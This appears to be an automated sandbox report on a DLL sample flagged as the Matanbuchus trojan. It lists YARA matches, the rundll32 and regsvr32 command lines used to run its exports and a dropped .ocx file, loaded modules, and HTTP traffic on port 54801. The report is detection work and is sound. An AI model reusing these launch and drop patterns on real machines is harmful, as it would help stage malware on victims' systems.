                Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 00000012.00000002.3113049716.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPEDMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: classification engineClassification label: mal100.troj.evad.winDLL@44/7@3/2
                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\8f08Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\8f08
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1020:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7588
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\3164e4ff-c709-4dec-a976-0f3f08fd1379Jump to behavior
                Source: file.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,CheckLicense
                Source: file.dllVirustotal: Detection: 16%
                Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\file.dll"
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,CheckLicense
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInit
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",CheckLicense
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInit
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstall
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setopt
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_perform
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_init
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanup
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Uninitialize
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",ThreadFunction
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Main
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",InitDll
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Init
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllUninitialize
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 608
                Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
                Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1Jump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,CheckLicenseJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInitJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInstallJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",CheckLicenseJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInitJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstallJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setoptJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_performJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_initJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanupJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",UninitializeJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",ThreadFunctionJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",MainJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",InitDllJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",InitJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllUninitializeJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1Jump to behavior
                Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
                Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\loaddll32.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\loaddll32.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msi.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: napinsp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: pnrpnsp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wshbth.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: nlaapi.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winrnr.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
                Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                Data Obfuscation

                barindex
                Yara detected Matanbuchus
                Source: Yara matchFile source: file.dll, type: SAMPLE
                Source: Yara matchFile source: 34.2.regsvr32.exe.6b810000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.rundll32.exe.6d050000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.rundll32.exe.4910000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.rundll32.exe.4910000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPED
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3D15C6 push ecx; ret 14_2_7F3D15D9
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDE15C6 push ecx; ret 18_2_7EDE15D9
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEE15C6 push ecx; ret 34_2_7EEE15D9
                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\8f08\user-PC\user-PC.ocxJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Uses known network protocols on non-standard ports
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49808
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49816
                Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49992
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49993
                Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49994
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDCC7B0 GetSystemDefaultLangID,IsIconic,SetLastError,GetCommandLineW,lstrlenA,GetSystemDefaultLCID,18_2_7EDCC7B0
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
